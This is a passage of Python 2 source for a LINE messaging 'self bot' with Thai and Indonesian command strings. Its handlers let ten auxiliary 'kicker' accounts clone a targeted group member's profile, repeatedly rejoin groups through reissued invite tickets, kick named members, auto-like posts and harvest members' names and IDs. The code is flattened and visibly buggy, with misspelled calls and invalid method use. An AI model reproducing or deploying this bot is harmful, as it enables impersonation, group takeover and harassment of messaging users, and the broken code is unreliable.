wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了关断。")
elif msg.text in ["Like on","เปิด ไลค์"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดอยู่แล้ว。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบออโต้ไลค์.👌")
elif msg.text in ["ปิด ไลค์","Like off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดอยู่แล้ว")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบออโต้ไลค์.👌")
#========================================
#========================================
elif msg.text in ["เชคค่า","เช็คค่า","Set"]:
print "Setting pick up..."
md = "SELF BOT\nBy:☬ARIFISTIFIK☬\n\n"
if wait["likeOn"] == True: md+=" ออโต้ไลค์ : ✔ \n"
else:md+=" ออโต้ไลค์ : ❌ \n"
if wait["alwayRead"] == True: md+=" อ่าน : ✔ ??\n"
else:md+=" อ่าน : ❌ \n"
if wait["detectMention"] == True: md+=" ตอบแทค : ✔ \n"
else:md+=" ตอบแทค : ❌ \n"
if wait["kickMention"] == True: md+=" ออโต้เตะ: ✔ \n"
else:md+=" ออโต้เตะ : ❌ \n"
if wait["Notifed"] == True: md+=" Notifed : ✔ \n"
else:md+=" Notifed : ❌ \n"
if wait["Notifedbot"] == True: md+=" Notifedbot : ✔ \n"
else:md+=" Notifedbot : ❌ \n"
if wait["acommentOn"] == True: md+=" Hhx1 : ✔ \n"
else:md+=" Hhx1 : ❌ \n"
if wait["bcommentOn"] == True: md+=" Hhx2 : ✔ \n"
else:md+=" Hhx2 : ❌ \n"
if wait["ccommentOn"] == True: md+=" Hhx3 : ✔ \n"
else:md+=" Hhx3 : ❌ \n"
if wait["Protectcancl"] == True: md+=" Cancel : ✔ \n"
else:md+=" Cancel : ❌ \n"
if wait["winvite"] == True: md+=" Invite: ✔ \n"
else:md+=" Invite : ❌ \n"
if wait["pname"] == True: md+=" ล็อคชื่อ : ✔ \n"
else:md+=" ล็อคชื่อ : ❌ \n"
if wait["contact"] == True: md+=" Contact : ✔ \n"
else: md+=" Contact : ❌ \n"
if wait["autoJoin"] == True: md+=" ออโต้เข้ากลุ่ม : ✔ \n"
else: md +=" ออโต้เข้ากลุ่ม : ❌ \n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + " \n"
else: md+= " Group cancel : ❌ \n"
if wait["leaveRoom"] == True: md+=" ออโต้ ออกแชท : ✔ \n"
else: md+=" ออโต้ ออกแชท: ❌ \n"
if wait["timeline"] == True: md+=" ออโต้ แชร์ : ✔ \n"
else:md+=" ออโต้ แชร์ : ❌ \n"
if wait["clock"] == True: md+=" ชื่อ นาฬิกา : ✔ \n"
else:md+=" ชื่อ นาฬิกา : ❌ \n"
if wait["autoAdd"] == True: md+=" ออโต้ เพิ่มเพื่อน : ✔ \n"
else:md+=" ออโต้ เพิ่มเพื่อน : ❌ \n"
if wait["commentOn"] == True: md+=" ออโต้ comment : ✔ \n"
else:md+=" ออโต้ comment : ❌ \n"
if wait["Backup"] == True: md+=" ดึงกลับ : ✔ \n"
else:md+=" ดึงกลับ : ❌ \n"
if wait["qr"] == True: md+=" ป้องกัน QR : ✔ \n"
else:md+=" ป้องกัน QR : ❌ \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
#========================================
elif msg.text in ["Restart","รีบูต"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "เชลmybot ได้รีสตาร์ตแล้ว.👌\nกรุณาตั้งค่าใหม่อีกครั้ง.👈")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#========================================
elif msg.text.lower() == 'muter':
if msg.toType == 2:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"waitting...")
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
#================================================#
# Admin command: add the group's creator as a contact and invite them
# back into the group (best-effort; failures are ignored).
elif msg.text in ["Gcreator:inv","เชิญเเอทมิน"]:
    if msg.from_ in admin:
        ginfo = cl.getGroup(msg.to)
        gCreator = ginfo.creator.mid
        try:
            cl.findAndAddContactsByMid(gCreator)
            cl.inviteIntoGroup(msg.to,[gCreator])
            print "success inv gCreator"
        except:
            # creator may have blocked the bot / left LINE; ignore
            pass
#============================
elif "kick1 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick1 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki1.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "kickเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick2 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick2 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "kickเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick3 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick3 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "kickเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick4 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick4 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki4.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "kickเกอร์ 4.👌\nแปลงร่าง อวตาง\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick5 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick5 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "kickเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick6 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick6 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki6.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "kickเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick7 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick7 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki7.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki7.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "kickเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick8 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick8 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki8.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki8.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "kickเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick9 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick9 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki9.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki9.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "kickเกอร์ 9.👌\nแปลงร้าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "kick10 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kick10 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki10.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "kickเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#=======================================================#
elif "kickทั้งหมด @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("kickทั้งหมด @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "kickเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "kickเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "kickเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "kickเกอร์ 4.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "kickเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "kickเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "kickเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "kickเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "kickเกอร์ 9.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "kickเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#====================================
#================================
elif "Nk: " in msg.text:
if msg.from_ in Creator:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki2.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
nk0 = msg.text.replace("Nk: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in X.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if target not in admin:
ki1.kickoutFromGroup(msg.to,[target])
ki1.leaveGroup(msg.to)
ki2sendText(msg.to,"Succes BosQ")
ki3.sendText(msg.to,"Pakyu~")
else:
cl.sendText(msg.to,"Admin Detected")
else:
cl.sendText(msg.to,"Lu sape!")
#=================================
elif msg.text in ["Backup:on","Backup on","open pull back","เปิดการเชิญกลับ"]:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off","Backup off","ปิด ดีงกลับ","ปิดการเชิญกลับ"]:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
#===========================================#
elif msg.text in ["Reject","rejec"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["rejec invite"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
#=============================================#
elif msg.text in ["Login","ขอลิ้ง"]:
if not LINEVITLogged:
lgncall = msg.to
ki1.login(qr=True,callback=logincall)
ki1.loginResult()
user2 = ki1.getProfile().mid
LINEVITLogged = True
now2 = datetime.datetime.now()
nowT = datetime.datetime.strftime(now2,"%H")
nowM = datetime.datetime.strftime(now2,"%M")
nowS = datetime.datetime.strftime(now2,"%S")
tm = "\n\n"+nowT+":"+nowM+":"+nowS
cl.sendText(user1,"ล็อกอินสำเร็จ พร้อมใช้งานแล้ว (`・ω・´)"+tm)
else:
cl.sendText(msg.to,"ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if AsulLogged == True:
try:
ki1.sendText(user1,tlist)
except:
ki1.new_post(tlist)
else:
cl.sendText(msg.to,"ยังไม่ได้ล็อคอิน")
#========================================#
elif msg.text in ["Reject1","kick1 rejec"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"kickเกอร์ 1\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject2","kick2 rejec"]:
gid = ki2.getGroupIdsInvited()
for i in gid:
ki2.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki2.sendText(msg.to,"kickเกอร์ 2\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject3","kick3 rejec"]:
gid = ki3.getGroupIdsInvited()
for i in gid:
ki3.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki3.sendText(msg.to,"kickเกอร์ 3\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject4","kick4 rejec"]:
gid = ki4.getGroupIdsInvited()
for i in gid:
ki4.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki4.sendText(msg.to,"kickเกอร์ 4\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject5","kick5 rejec"]:
gid = ki5.getGroupIdsInvited()
for i in gid:
ki5.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki5.sendText(msg.to,"kickเกอร์ 5\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject6","kick6 rejec"]:
gid = ki6.getGroupIdsInvited()
for i in gid:
ki6.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki6.sendText(msg.to,"kickเกอร์ 6\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject7","kick7 rejec"]:
gid = ki7.getGroupIdsInvited()
for i in gid:
ki7.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki7.sendText(msg.to,"kickเกอร์ 7\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject8","kick8 rejec"]:
gid = ki8.getGroupIdsInvited()
for i in gid:
ki8.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki8.sendText(msg.to,"kickเกอร์ 8\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject9","kick9 rejec"]:
gid = ki9.getGroupIdsInvited()
for i in gid:
ki9.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki9.sendText(msg.to,"kickเกอร์ 9\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject10","kick10 rejec"]:
gid = ki10.getGroupIdsInvited()
for i in gid:
ki10.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki10.sendText(msg.to,"kickเกอร์ 10\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Y1 rgroups","Y1 rgroup"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"Bot All invitations is clean")
else:
ki1.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Add:on","Auto add:on","Add on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah on Bosqu")
elif msg.text in ["Add:off","Auto add off","Add off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah off Bosqu")
elif msg.text in ["R chat"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"Sedang diproses...")
cl.sendText(msg.to,"Ok")
# elif "รัน @" in msg.text:
# _name = msg.text.replace("รัน @","")
# _nametarget = _name.rstrip(' ')
# gs = cl.getGroup(msg.to)
# for g in gs.members:
# if _nametarget == g.displayName:
# cl.sendText(msg.to,"เริ่มทำการรัน")
# cl.sendText(g.mid,"[☬Ŧ€ΆM฿❂Ŧ↔Pђãỳãƒir€☬]\n[By.☬ARIFISTIFIK☬]\n http://line.me/ti/p/arif.mh")
# cl.sendText(msg.to, "ทำการรันเรียบร้อย")
# print "Done spam"
#========================================
elif msg.text.lower() == 'Online check':
cl.sendText(msg.to, "โปรดรอสักครู่....")
eltime = time.time() - mulai
van = "[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\nระยะเวลาที่mybotทำงาน\n"+waktu(eltime)
cl.sendText(msg.to,van)
#========================================
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message: " in msg.text:
wait["message"] = msg.text.replace("Add message: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Message","Com"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Coms set:" in msg.text:
c = msg.text.replace("comment:","Coms set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment: " in msg.text:
c = msg.text.replace("Add comment: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["com on","Com on","Comment:on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["com off","Com off","Comment:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Comment","Coms"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["HHX1","Hhx1"]:
cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"]))
elif msg.text in ["HHX2","Hhx2"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"]))
elif msg.text in ["HHX3","Hhx3"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"]))
elif "Hhx1:" in msg.text:
c = msg.text.replace("Hhx1:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["acomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c)
elif "Hhx2:" in msg.text:
c = msg.text.replace("Hhx2:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["bcomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c)
elif "Hhx3:" in msg.text:
c = msg.text.replace("Hhx3:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["ccomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c)
elif msg.text in ["Hhx1 on"]:
if wait["acommentOn"] == True:
if wait["lang"] == "JP":
